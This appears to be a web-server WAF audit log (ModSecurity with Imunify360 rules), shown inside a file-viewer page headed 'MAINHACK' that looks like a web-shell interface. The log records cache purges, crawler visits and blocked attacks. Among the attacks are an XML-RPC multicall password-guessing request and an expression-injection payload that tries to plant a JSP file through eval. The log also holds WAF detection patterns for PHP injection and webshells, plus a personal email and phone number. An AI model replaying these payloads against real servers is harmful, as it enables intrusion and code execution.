[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: modsec_log_103.185.74.40.txt
File is not writable. Editing disabled.
Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233402989757 1020192 (- - -) Stopwatch2: 1751233402989757 1020192; combined=3878, p1=91, p2=3342, p3=143, p4=8, p5=233, sr=69, sw=0, l=0, gc=61 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ef52af20-Z-- --05438020-A-- [30/Jun/2025:03:13:24.018759 +0530] aGGzerfh0HubEMB53AwGoAAAAA0 103.185.74.40 22503 192.168.74.40 443 --05438020-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --05438020-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05438020-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233402775854 1243298 (- - -) Stopwatch2: 1751233402775854 1243298; combined=2503, p1=85, p2=2136, p3=0, p4=0, p5=282, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05438020-Z-- --44c5e659-A-- [30/Jun/2025:03:13:24.747134 +0530] aGGze1TzcR44go1TAbnI8wAAAAs 2.58.56.24 52926 192.168.74.40 443 --44c5e659-B-- POST //xmlrpc.php HTTP/1.1 Host: rukunaltazaj.com Keep-Alive: 300 Connection: keep-alive Cookie: pll_language=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml Content-Length: 483 --44c5e659-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>rukun</string></value><value><string>1234</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --44c5e659-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233404776911 21737 (- - -) Stopwatch2: 1751233404776911 21737; combined=6084, p1=192, p2=5569, p3=106, p4=17, p5=200, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f6c20c3f-Z-- --3539536f-A-- [30/Jun/2025:03:13:25.374205 +0530] aGGzfAFYEHPiTVtVrc8-0wAAABU 103.185.74.40 53930 192.168.74.40 443 --3539536f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3539536f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3539536f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233404230627 1144000 (- - -) Stopwatch2: 1751233404230627 1144000; combined=2957, p1=122, p2=2660, p3=0, p4=0, p5=175, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3539536f-Z-- --d6854966-A-- [30/Jun/2025:03:13:25.935220 +0530] aGGzfU9ckYDu-wxh82kCBgAAACI 20.171.207.114 51150 192.168.74.40 443 --d6854966-B-- GET /returns_refunds.php/images/images/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/images/js/cart_empty.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=9qeirg2ig7h0cs6m8ngqo5ku05 host: ozautomotives.com.au --d6854966-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ae62f07e-Z-- --e2fcab1c-A-- [30/Jun/2025:03:49:50.564140 +0530] aGG8BmPuHNyj2WEVAJ_7CwAAACk 54.238.164.208 60394 192.168.74.40 443 --e2fcab1c-B-- POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Connection: close Content-Length: 256 Content-type: application/x-www-form-urlencoded Accept-Encoding: gzip --e2fcab1c-C-- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]} --e2fcab1c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e2fcab1c-H-- Message: Pattern match "(?i)\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]}. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "53"] [id "77134464"] [msg "IM360 WAF: Infectors: PHP Injection High-Risk PHP Function||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/uapjs||"] [severity "DEBUG"] [tag "service_im360"] Message: Pattern match "(?:print|echo|eval|exec)\\(" at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]}. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "91"] [id "77140881"] [msg "IM360 WAF: Infectors: Arbitrary code execution vulnerability in Request URI||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/uapjs||"] [severity "DEBUG"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751235590004098 560497 (- - -) Stopwatch2: 1751235590004098 560497; combined=12823, p1=160, p2=12392, p3=0, p4=0, p5=271, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e2fcab1c-Z-- --9ad6551b-A-- [30/Jun/2025:03:49:52.541519 +0530] aGG8Bw62vJhyO1HBb4bj0AAAACY 43.159.132.207 46602 192.168.74.40 80 --9ad6551b-B-- GET /ugcourse-college-admission-palani.php HTTP/1.1 Host: www.scas.org.in User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --9ad6551b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237020792648 16378 (- - -) Stopwatch2: 1751237020792648 16378; combined=2911, p1=124, p2=2615, p3=0, p4=0, p5=172, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --40f54771-Z-- --135a6446-A-- [30/Jun/2025:04:13:41.904286 +0530] aGHBnIhTMaRSLrHujwHt8gAAAAw 103.185.74.40 58333 192.168.74.40 443 --135a6446-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --135a6446-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --135a6446-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237020656517 1248020 (- - -) Stopwatch2: 1751237020656517 1248020; combined=3183, p1=114, p2=2922, p3=0, p4=0, p5=146, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --135a6446-Z-- --c7fbcd01-A-- [30/Jun/2025:04:13:42.077926 +0530] aGHBnvb_H9JJq-59BHnsLQAAAEM 20.171.207.232 36572 192.168.74.40 443 --c7fbcd01-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-agra/js/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c7fbcd01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c7fbcd01-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237023257490 17289 (- - -) Stopwatch2: 1751237023257490 17289; combined=3784, p1=167, p2=3488, p3=0, p4=0, p5=129, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e1294e7f-Z-- --0adecb26-A-- [30/Jun/2025:04:13:43.332632 +0530] aGHBnk6GU2Qn68mjaVRKlgAAAAM 103.185.74.40 40782 192.168.74.40 443 --0adecb26-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0adecb26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0adecb26-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237022115754 1217226 (- - -) Stopwatch2: 1751237022115754 1217226; combined=2662, p1=104, p2=2342, p3=0, p4=0, p5=216, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0adecb26-Z-- --50aa6f6c-A-- [30/Jun/2025:04:13:43.792682 +0530] aGHBn4hTMaRSLrHujwHt8wAAAAw 14.241.242.64 37945 192.168.74.40 443 --50aa6f6c-B-- POST /contact-us.php HTTP/1.1 Host: SARAVANABUILDERS.COM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Transfer-Encoding: chunked Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Connection: close Content-Type: application/json Cookie: PHPSESSID=2138ab4ee0fd432d9432dfe480be59f5 Upgrade-Insecure-Requests: 1 --50aa6f6c-C-- {"email":"jonesregina1970@yahoo.com","name":"XaiZMRoGko","phone":"9241857645"} -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751239473988657 20881 (- - -) Stopwatch2: 1751239473988657 20881; combined=4953, p1=137, p2=4520, p3=140, p4=13, p5=142, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --34136b59-Z-- --f2dd544e-A-- [30/Jun/2025:04:54:35.078038 +0530] aGHLM4xNbWjYKqpX5RfJ_AAAADE 103.185.74.40 20150 192.168.74.40 443 --f2dd544e-B-- POST /wp-cron.php?doing_wp_cron=1751239474.6794710159301757812500 HTTP/1.1 Host: adillusion.com User-Agent: WordPress/6.4.5; https://adillusion.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --f2dd544e-C-- --f2dd544e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --f2dd544e-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7490, p1=123, p2=7155, p3=208, p4=4, p5=0, sr=46, sw=0, l=0, gc=0||Py scan:10679||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751239475059313 19070 (- - -) Stopwatch2: 1751239475059313 19070; combined=7739, p1=123, p2=7155, p3=208, p4=4, p5=249, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2dd544e-Z-- --f72e511b-A-- [30/Jun/2025:04:54:35.113475 +0530] aGHLM4de_FFHVOwW1Rxn4AAAACA 20.171.207.232 44040 192.168.74.40 443 --f72e511b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/testimonials/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f72e511b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f72e511b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240618044421 14244 (- - -) Stopwatch2: 1751240618044421 14244; combined=2892, p1=155, p2=2536, p3=0, p4=0, p5=200, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8739e81d-Z-- --5376435d-A-- [30/Jun/2025:05:13:38.660478 +0530] aGHPqWqNdIPZFRu13YsAxwAAAB8 103.185.74.40 47972 192.168.74.40 443 --5376435d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --5376435d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5376435d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240617551485 1109347 (- - -) Stopwatch2: 1751240617551485 1109347; combined=2235, p1=80, p2=1997, p3=0, p4=0, p5=157, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5376435d-Z-- --fc1b305b-A-- [30/Jun/2025:05:13:38.710351 +0530] aGHPqgPfZ2nlMBWDsmIY3gAAADA 20.171.207.114 47784 192.168.74.40 443 --fc1b305b-B-- GET /returns_refunds.php/admin@oz/sweetalert-master/dist/images/js/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/js/cart.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=nfolgh20ar1bdhc7rs9vb35lu3 host: ozautomotives.com.au --fc1b305b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751240619401567 463924 (- - -) Stopwatch2: 1751240619401567 463924; combined=7459, p1=248, p2=6803, p3=156, p4=3, p5=248, sr=180, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --39960732-Z-- --d3af3d6d-A-- [30/Jun/2025:05:13:40.265153 +0530] aGHPqg_iStjAv6ue9uEmZgAAAAw 103.185.74.40 12539 192.168.74.40 443 --d3af3d6d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d3af3d6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d3af3d6d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240618940597 1324878 (- - -) Stopwatch2: 1751240618940597 1324878; combined=2673, p1=83, p2=2434, p3=0, p4=0, p5=155, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d3af3d6d-Z-- --df555974-A-- [30/Jun/2025:05:13:40.816757 +0530] aGHPq6lpraUFhCVMJwbStgAAAAY 170.106.72.93 33636 192.168.74.40 80 --df555974-B-- GET / HTTP/1.1 Host: www.bechdoanaj.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --df555974-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 Cache-Control: no-cache, private -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --73dede5a-Z-- --e9784438-A-- [30/Jun/2025:05:29:30.292596 +0530] aGHTYSXyVzaAtUvsLrwbmwAAABY 162.216.150.9 63996 192.168.74.40 443 --e9784438-B-- GET / HTTP/1.1 Host: 103.185.74.40:443 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --e9784438-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e9784438-H-- Message: Access denied with code 403 (phase 1). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 1) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241569745345 548256 (- - -) Stopwatch2: 1751241569745345 548256; combined=223, p1=92, p2=0, p3=0, p4=0, p5=131, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e9784438-Z-- --5ef8e22f-A-- [30/Jun/2025:05:29:30.313434 +0530] aGHTYq7C7NxMgetm3tnZJwAAAC4 20.171.207.232 44180 192.168.74.40 443 --5ef8e22f-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5ef8e22f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5ef8e22f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241570298519 15225 (- - -) Stopwatch2: 1751241570298519 15225; combined=2976, p1=155, p2=2684, p3=0, p4=0, p5=137, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241916803162 15512 (- - -) Stopwatch2: 1751241916803162 15512; combined=3636, p1=157, p2=3342, p3=0, p4=0, p5=137, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4ce24c0d-Z-- --4415ca34-A-- [30/Jun/2025:05:35:16.828119 +0530] aGHUuyrZfMONs8aFSvwZKQAAAB4 103.185.74.40 26763 192.168.74.40 443 --4415ca34-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4415ca34-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4415ca34-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] 